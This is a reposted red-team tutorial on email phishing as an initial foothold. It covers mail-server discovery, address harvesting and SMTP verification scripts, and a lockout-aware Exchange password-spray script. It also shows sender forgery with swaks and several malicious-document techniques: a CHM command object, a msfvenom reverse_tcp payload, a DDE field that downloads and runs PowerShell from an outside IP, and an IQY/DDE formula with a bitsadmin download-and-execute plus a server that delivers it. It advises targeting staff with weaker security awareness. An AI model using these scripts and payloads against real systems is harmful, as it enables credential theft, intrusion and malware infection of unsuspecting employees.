Red team testing: getting a foothold through email


# This article is reposted from Jiuxian No.6 Unit. If this causes any problem, please contact us and it will be deleted immediately.

With the rapid growth of the Internet, office work cannot do without the network, and email has become one of the most common office tools.

This article starts from information collection as the first step and works step by step towards email phishing, covering information gathering, address verification, locating the mail service, forging senders, crafting phishing documents and other aspects.

During a penetration test, using email as the foothold is also a common way of doing the battlefield "earthwork" of tunnelling into the target's interior bit by bit.

This step matters in a penetration test: it is the move to try when the exposed systems show no vulnerabilities or other clues. An attacker always feels that information collection plus email phishing can still catch the "fish that slipped through the net".

Finding the target's open mail service ports and webmail entry point

(1) Find the entry point by scanning the C segment

Given the target's domain, first resolve its MX record to get the real IP address of the mail server (some targets use a third-party mail service, in which case the MX record does not point at the target's own infrastructure and is of no use here). Then scan the C segment (the /24) of that IP for the mail ports 25, 109, 110, 143, 465, 995 and 993; under normal circumstances the mail server entry point is easy to find this way. Port 587 (submission) and the HTTPS webmail login on 443 are worth adding to the same scan.


(2) Find the mail entry point by scanning subdomains

There are many subdomain enumeration tools, such as Sublist3r, Teemo, LangSrcCurise and Excavator.


(3) Crawling through search engines

Google hacking; Baidu, Sogou, 360, Bing.

site:target.com intitle:"Outlook Web App"

site:target.com intitle:"mail"

site:target.com intitle:"webmail"

Shodan, FOFA, ZoomEye and other cyberspace search engines.


Some conventional ways to collect target mailboxes in batches

https://hunter.io/

http://www.skymem.info/

https://www.email-format.com/i/search/

The Teemo tool mentioned above can also collect mailboxes for a domain:

https://github.com/bit4woo/teemo

The following tool also searches for mailboxes through search engines, cyberspace search engines, social networks, recruitment sites and so on:

https://github.com/laramies/theHarvester

This tool integrates many APIs by default, and through them target mailboxes can be grabbed in bulk quickly. Because the API keys are left at their defaults and some are not filled in, the results are relatively few; in practice, combine it with other tools and then merge and deduplicate the final results.

python3 theHarvester.py -d xxx.com -l 1000 -b all -f test.html

Verifying mailboxes

After collecting mailboxes we need to verify them, because some of them belong to people who have already left or changed roles (resignation, transfer, etc.) and are no longer in use.

(1) Check whether a single address exists through mailtester.com.

https://mailtester.com/testmail.php


(2) The verifyemail tool can verify addresses in batches.

https://github.com/Tzeross/verifyemail

(3) mailtester.py

This tool automatically generates address combinations and then verifies each one.

Its advantage is that it freely assembles combinations from the names in the First / Last Name columns and then verifies them one by one.

When enumerating mailbox users, gather as many dictionaries as possible: Chinese pinyin names, letter abbreviations, top 100 / 1,000 / 10,000 lists. More harpoons means more fish: every extra mailbox raises the success rate.

We can also pick out the people who appear to be network administrators, operations staff or the security department, and either write to them separately or not at all. Their security awareness is relatively high and they are easily alerted. We should start with non-technical employees whose awareness is weaker: pick the soft persimmons first.

Here you can use https://www.aies.cn/pinyin.htm together with the collected target information to build a name dictionary for the combinations.

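The combine-then-verify procedure above, as an added example (not code from the original article or from mailtester.py): it builds the usual corporate address patterns from a pinyin surname and given name, then checks each with SMTP RCPT TO without sending mail. It first probes a random address, because a catch-all domain answers 250 to everything and makes per-address results meaningless. Assumptions: the MX host accepts plain SMTP on port 25 without greylisting; target.com, mx.target.com and probe.example.org are placeholders.

```python
# Added example, not from the original article: build candidate addresses from
# surname/given-name pinyin and verify them the way mailtester-style tools do,
# with SMTP RCPT TO and a catch-all probe first. Assumptions: the MX host accepts
# plain SMTP on port 25 without greylisting; target.com, mx.target.com and
# probe.example.org are placeholders.
import secrets
import smtplib


def candidates(surname: str, given: str, domain: str) -> list:
    """Common corporate local-part patterns for a pinyin name (zhang san -> zhangsan, zsan, ...)."""
    s, g = surname.lower(), given.lower()
    si, gi = s[0], g[0]
    local_parts = {
        s + g, g + s,                # zhangsan, sanzhang
        f"{s}.{g}", f"{g}.{s}",      # zhang.san, san.zhang
        f"{s}_{g}", f"{g}_{s}",
        si + g, s + gi,              # zsan, zhangs
        gi + s, g + si,              # szhang, sanz
        si + gi, gi + si,            # zs, sz
    }
    return sorted(f"{lp}@{domain}" for lp in local_parts)


def rcpt_code(mx_host: str, address: str, timeout: float = 10.0) -> int:
    """SMTP reply code for RCPT TO:<address>; no message is ever sent."""
    with smtplib.SMTP(mx_host, 25, local_hostname="probe.example.org", timeout=timeout) as smtp:
        smtp.ehlo_or_helo_if_needed()
        smtp.mail("probe@probe.example.org")
        code, _ = smtp.rcpt(address)
        smtp.rset()  # abandon the transaction instead of sending DATA
        return code


def verdict(probe_code: int, catch_all_code: int) -> str:
    """Interpret a RCPT result in light of the random-address probe."""
    if catch_all_code == 250:
        return "inconclusive: catch-all domain accepts every RCPT"
    if probe_code == 250:
        return "valid"
    if 500 <= probe_code < 600:
        return "invalid"
    return "unknown: temporary failure (greylisting or rate limit), retry later"


def verify_batch(mx_host: str, domain: str, addresses) -> dict:
    """Probe a random address first, then each candidate; returns {address: verdict}."""
    catch_all = rcpt_code(mx_host, f"{secrets.token_hex(8)}@{domain}")
    if catch_all == 250:
        return {a: verdict(250, catch_all) for a in addresses}  # no point probing further
    return {a: verdict(rcpt_code(mx_host, a), catch_all) for a in addresses}


if __name__ == "__main__":
    # mx.target.com is a placeholder for the host from the target's MX record
    for addr, result in verify_batch("mx.target.com", "target.com",
                                     candidates("zhang", "san", "target.com")).items():
        print(addr, result)
```

Every RCPT probe is logged on the mail server, so space the probes out; a burst of 550s from one source IP followed by phishing mail from the same address is an easy thing for the defenders to correlate.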
Mailbox brute forcing

Weak-password brute forcing only applies to the target company's own mail server, such as OWA. Public mailboxes such as Baidu, Tencent, Alibaba and NetEase are not a priority.

Tools include medusa, hydra, SNETCracker, the APT34 OWA brute-forcing tool, and so on.

In addition, mail passwords often follow patterns such as company abbreviation + 2019, 2020 and similar social-engineering passwords; one more dictionary raises the success rate. Check the account lockout policy first: spraying one password across many accounts and waiting out the observation window is far less likely to lock users out (and alert the defenders) than running a whole dictionary against one account.
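The dictionary and the lockout-aware spray as an added example (not code from the original article or from any of the tools it names): the company-abbreviation-plus-year patterns the text mentions, a scheduler that never sends an account more guesses than the lockout threshold allows within one window, and a single Basic-auth attempt. Assumptions: Basic authentication is enabled on /EWS/Exchange.asmx and answers 401 for bad credentials (modern Exchange Online has Basic auth disabled, so verify on the target first); mail.target.com, CORP and the abbreviation "abc" are placeholders.

```python
# Added example, not from the original article: build the "company abbreviation +
# year" dictionary the text mentions and schedule a lockout-aware password spray
# against an Exchange endpoint. Assumptions: Basic auth against /EWS/Exchange.asmx
# answers 401 for bad credentials (verify on your target; it is often disabled);
# mail.target.com, CORP and the abbreviation "abc" are placeholders.
import base64
import urllib.error
import urllib.request


def seasonal_dictionary(abbr: str, years) -> list:
    """Candidate passwords in the patterns users actually pick: abc2020, Abc2020!, abc@2020 ..."""
    out = []
    for y in years:
        for base in (abbr.lower(), abbr.capitalize(), abbr.upper()):
            out += [f"{base}{y}", f"{base}{y}!", f"{base}@{y}", f"{base}#{y}", f"{base}{y}."]
    return list(dict.fromkeys(out))  # dedupe, keep order


def spray_rounds(users, passwords, attempts_per_window: int) -> list:
    """Split guesses into rounds so that no account sees more than `attempts_per_window`
    guesses before the observation window resets. Set it at least one below the lockout
    threshold and sleep for the whole window between rounds."""
    rounds = []
    for i in range(0, len(passwords), attempts_per_window):
        chunk = passwords[i:i + attempts_per_window]
        rounds.append([(u, p) for p in chunk for u in users])  # one password across all users first
    return rounds


def try_basic_auth(url: str, domain: str, user: str, password: str, timeout: float = 10.0) -> bool:
    """One Basic-auth attempt; True if the server answered anything other than 401."""
    token = base64.b64encode(f"{domain}\\{user}:{password}".encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": f"Basic {token}",
                                               "User-Agent": "Microsoft Office/16.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status != 401
    except urllib.error.HTTPError as e:
        return e.code != 401


if __name__ == "__main__":
    import time
    users = ["zhangsan", "lisi"]                       # from the verified-mailbox step
    pwds = seasonal_dictionary("abc", (2019, 2020))
    for rnd in spray_rounds(users, pwds, attempts_per_window=2):
        for u, p in rnd:
            if try_basic_auth("https://mail.target.com/EWS/Exchange.asmx", "CORP", u, p):
                print("hit:", u, p)
        time.sleep(35 * 60)  # a common observation window is 30 minutes; wait it out
```

A non-401 answer only means the credentials were not rejected outright; confirm a hit by logging into the webmail interface before building on it.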

Forging senders

Under normal circumstances, if the target domain publishes no SPF record, you can forge the sender directly with swaks.


A brief word about SPF and DKIM.

SPF: roughly, the receiving server checks whether the IP address that delivered the mail is listed in the SPF record of the envelope sender's domain. If it is, the mail is treated as legitimate; otherwise it may be rejected or marked.

DKIM: its main function is to verify that the mail has not been modified in transit, i.e. it ensures the integrity of the message (a signature over selected headers and the body, with the public key published in DNS).

If SPF is present, you need to get around it: use swaks together with SMTP2GO, i.e. send through a mail hosting platform whose servers are authorised for a domain you control. SPF only checks the envelope sender, so the visible From header can still carry the target's domain; what ultimately stops this is DMARC on the receiving side, which requires the From domain to align with the SPF- or DKIM-authenticated domain.
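The check to run before choosing between direct forgery and a relay, as an added example (not code from the original article): it reads the target's SPF and DMARC records and says which route from the text applies. The TXT lookups assume the third-party dnspython package; the parsing and assessment functions need no network. target.com is a placeholder.

```python
# Added example, not from the original article: read a domain's SPF and DMARC
# records and say which forging route from the text applies. Assumes the
# third-party dnspython package (`pip install dnspython`) for TXT lookups;
# the parsing and assessment functions need no network. target.com is a placeholder.


def parse_spf(record: str) -> dict:
    """{'mechanisms': [(qualifier, mechanism), ...], 'all': '-'|'~'|'?'|'+'|None} for a v=spf1 record."""
    parts = record.split()
    if not parts or parts[0].lower() != "v=spf1":
        return {}
    mechanisms, all_qualifier = [], None
    for term in parts[1:]:
        qualifier = term[0] if term[0] in "+-~?" else "+"
        body = term.lstrip("+-~?")
        if body.lower() == "all":
            all_qualifier = qualifier
        else:
            mechanisms.append((qualifier, body))
    return {"mechanisms": mechanisms, "all": all_qualifier}


def parse_dmarc(record: str) -> dict:
    """Tag/value pairs of a v=DMARC1 record ({} if it is not one)."""
    tags = {}
    for item in record.split(";"):
        if "=" in item:
            key, value = item.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags if tags.get("v", "").upper() == "DMARC1" else {}


def assess(spf: dict, dmarc: dict) -> str:
    """Which route from the text applies. SPF is checked against the envelope
    sender (MAIL FROM) and the connecting IP; only DMARC ties the visible From
    header to that result, so SPF alone does not stop a relayed forgery."""
    policy = dmarc.get("p", "none").lower()
    subdomain_policy = dmarc.get("sp", policy).lower()
    if not spf:
        return "no SPF: forge directly with swaks from any host"
    if policy in ("reject", "quarantine"):
        note = "" if subdomain_policy != "none" else " (subdomains are unprotected, sp=none)"
        return "SPF plus enforcing DMARC: header-From forgery fails alignment" + note
    if spf["all"] in ("-", "~"):
        return ("SPF without enforcing DMARC: direct sending fails SPF, but relaying through a "
                "provider where you verified your own domain passes SPF with a forged From header")
    return "SPF present but ?all/+all (or no all term): direct forgery is still likely to be accepted"


def lookup_txt(name: str) -> list:
    import dns.resolver  # assumption: dnspython is installed
    try:
        return ["".join(s.decode() for s in r.strings) for r in dns.resolver.resolve(name, "TXT")]
    except dns.exception.DNSException:
        return []


def check_domain(domain: str) -> str:
    spf = next((parse_spf(t) for t in lookup_txt(domain) if t.lower().startswith("v=spf1")), {})
    dmarc = next((parse_dmarc(t) for t in lookup_txt(f"_dmarc.{domain}")
                  if t.upper().startswith("V=DMARC1")), {})
    return assess(spf, dmarc)


if __name__ == "__main__":
    print(check_domain("target.com"))
```

The DMARC policy is published by the target but enforced by the receiving server, so what matters in practice is the DMARC policy of the domain whose users you are mailing; check both when sender and recipient domains differ.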

SMTP2GO configuration:

Create an account and verify a domain name that you control.

swaks --to <to-address> \
  --from <forged-from-address> \
  --ehlo xxx \
  --body "hello, i'm 007" \
  --server mail.smtp2go.com -p 2525 -au user -ap pass

Under the sender address the mail client shows that the message was sent via the xxx platform, but people who do not look carefully or do not understand the technology are easily fooled.

Another method is to save an existing message as an .eml file.

Delete the From header in the file and modify the To field, then send the file as the message data:

swaks --to <to-address> \
  --from <forged-from-address> \
  --data 1.eml --h-from \
  --server mail.smtp2go.com -p 2525 -au user -ap pass


Making phishing documents

1) Traditional macro documents


2) CHM phishing

Create a new folder, save the following code as index.html in it, and compile it into a CHM with the EasyCHM tool.

Here it pops a calculator; replace calc.exe with our trojan.

<!DOCTYPE html>
<html>
<head><title>Mousejack replay</title></head>
<body>
command exec
<!-- HTML Help ShortCut command; Item1 is "<window class>, <command line>" -->
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=", calc.exe">
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body>
</html>

After generating it, give it a name that invites a click.

3) CVE-2018-8174

Exploit:

https://github.com/0x09AL/CVE-2018-8174-msf.git


4) Windows shortcut (.lnk)

First generate a payload with MSF:

msfvenom -p windows/meterpreter/reverse_tcp lhost=vpsip lport=1234 -f msi > shell.txt

msiexec.exe is a system process that belongs to Windows Installer. Having the shortcut launch this process to install our package gives a certain degree of evasion; the .txt extension only hides what the file is, msiexec does not care about it.

Of course the method is not unique; there are many other ways, such as using PowerShell to download and execute your own trojan remotely.

5) Constructing DDE phishing documents

Create a document named dde.docx and open it. Pressing Ctrl+F9 inserts an empty field; type the following between the braces (it pops a calculator). In a real engagement this is where the trojan is loaded remotely.

DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"


DDEAUTO "C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://xx.xx.xx.xx/1.ps1'); # " "Microsoft Document Security Add-On"

Backslashes are switch characters inside field codes, which is why the paths in this version are doubled. The second quoted string is the DDE topic; Word shows it in its "remote data is not accessible, start the application?" prompt, so a benign-looking name makes that dialog less alarming. Word also asks the user to confirm updating links when the document opens, so the lure text around the field matters.

It comes online after the click.


6) Deceiving with an inserted external object (OLE) in Word

Click and it comes online.

7) IQY feature phishing

Using Out-WebQuery.ps1 from nishang, generate an .iqy file that contains the URL of the malicious payload.

powershell -exec bypass -Command "& {Import-Module 'C:\Epic\nishang-master\Client\Out-WebQuery.ps1';Out-WebQuery -URL http://192.168.1.5/iqy.html}"

Put the following in the iqy.html page:

=cmd|' /c bitsadmin /transfer c6c5 http://ip:port/a %APPDATA%\c6c5.exe&%APPDATA%\c6c5.exe&del %APPDATA%\c6c5.exe '!A0

bitsadmin transfers are really slow...

Besides delivering a payload, this feature can also be used to steal sensitive information such as the target user's account and password.
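The two halves of the IQY chain as an added example (not nishang's code and not from the original article): the .iqy file itself is three lines of text, Excel fetches the URL on its third line, and the page it fetches hands back the DDE formula. The block also parses both the way a reviewer would, so the same code serves to triage a suspicious attachment. http://192.0.2.10/iqy.html is a placeholder attacker URL.

```python
# Added example, not nishang's code and not from the original article: produce the
# .iqy file and the page it fetches, and parse both the way a reviewer would.
# Assumption: http://192.0.2.10/iqy.html is a placeholder attacker URL.
import re
from http.server import BaseHTTPRequestHandler, HTTPServer


def make_iqy(url: str) -> str:
    """Excel web query: line 1 'WEB', line 2 a query id, line 3 the URL Excel will fetch."""
    return f"WEB\n1\n{url}\n"


def parse_iqy(text: str):
    """Return the external URL an .iqy points at, or None if it is not a web query."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return None
    return lines[2]


def dde_formula(command: str) -> str:
    """The cell Excel receives: app|topic!item, here with cmd as the DDE server."""
    return f"=cmd|' /c {command} '!A0"


FORMULA_RE = re.compile(r"^\s*[=+\-@].*\|.*!", re.DOTALL)


def is_dde_formula(cell: str) -> bool:
    """Starts like a formula and has the app|topic!item shape of a DDE link."""
    return bool(FORMULA_RE.match(cell))


class PayloadPage(BaseHTTPRequestHandler):
    """Serves the formula text so that opening the .iqy pulls it into the sheet."""
    body = dde_formula("calc.exe")

    def do_GET(self):
        data = self.body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


if __name__ == "__main__":
    url = "http://192.0.2.10/iqy.html"
    with open("invoice.iqy", "w") as f:
        f.write(make_iqy(url))
    print("iqy points at:", parse_iqy(make_iqy(url)))
    HTTPServer(("0.0.0.0", 80), PayloadPage).serve_forever()
```

Excel prompts once to enable the external data connection and again before starting the DDE application, so the lure has to justify two clicks; on the defensive side, any .iqy attachment whose third line points outside the company is worth blocking before a user ever sees those prompts.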

8) PPSX phishing built on the PowerPoint action-button feature

Since my HTA kept having problems coming online here, possibly because of the system version, I used the HTA to load PowerShell and then had PowerShell remotely load and execute the specified CS beacon.

It must be saved in .ppsx format.

9) RAR decompression phishing

WinRAR vulnerability exploit:

https://github.com/WyAtu/CVE-2018-20250

Generate the archive and send it to the target machine to be extracted. Since this quick demonstration did no AV evasion, the trojan was intercepted by Huorong after the machine restarted.

In addition, phishing pages that imitate the target's login portals (VPN, mail, OA and so on) can be used to steal account credentials. The methods and details of real red-team phishing vary widely.

Source: https://blog.csdn.net/weixin_44110913/article/details/109133823